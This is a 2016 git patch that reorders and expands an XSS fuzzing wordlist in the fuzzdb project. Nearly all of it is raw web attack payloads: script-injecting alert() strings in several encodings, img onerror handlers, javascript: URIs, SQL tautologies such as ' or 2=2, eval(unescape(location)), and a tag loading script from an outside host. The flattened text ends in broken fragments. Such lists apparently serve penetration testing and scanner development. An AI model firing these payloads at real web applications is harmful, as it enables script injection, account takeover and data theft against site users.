From ea0b7142c2793948cfe48863ab846d4f1efe32d2 Mon Sep 17 00:00:00 2001 From: Adam Muntner Date: Wed, 9 Mar 2016 18:49:32 -0500 Subject: [PATCH] Update xss-other.fuzz.txt --- attack/xss/xss-other.fuzz.txt | 77 +++++++++++++++++++++-------------- 1 file changed, 46 insertions(+), 31 deletions(-) diff --git a/attack/xss/xss-other.fuzz.txt b/attack/xss/xss-other.fuzz.txt index 20a0743..ec7f402 100644 --- a/attack/xss/xss-other.fuzz.txt +++ b/attack/xss/xss-other.fuzz.txt @@ -1,42 +1,57 @@ -<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> -http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe -https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe -&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi -&alert&A7&(1)&R&UA;&&<&A9&11/script&X&> -PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== -<img src=x:x onerror=alert(1)> -javascript:alert(1) -alert(1) -alert +' + +' or 2=2 +" +" or 202 +";eval(unescape(location))//# %0Aalert(0) +"> alert(1) -alert(1) -alert`1` -alert\\`1\\` +&alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +&#39;&#88;&#83;&#83;&#39;&#41;> <IMG """>"> +<img src=x:x onerror=alert(1)> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; +<SCRIPT SRC=//xss.rocks/.j> +'); alert('XSS +\";alert('XSS');// +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +< xxs link xxs link - - + + + + +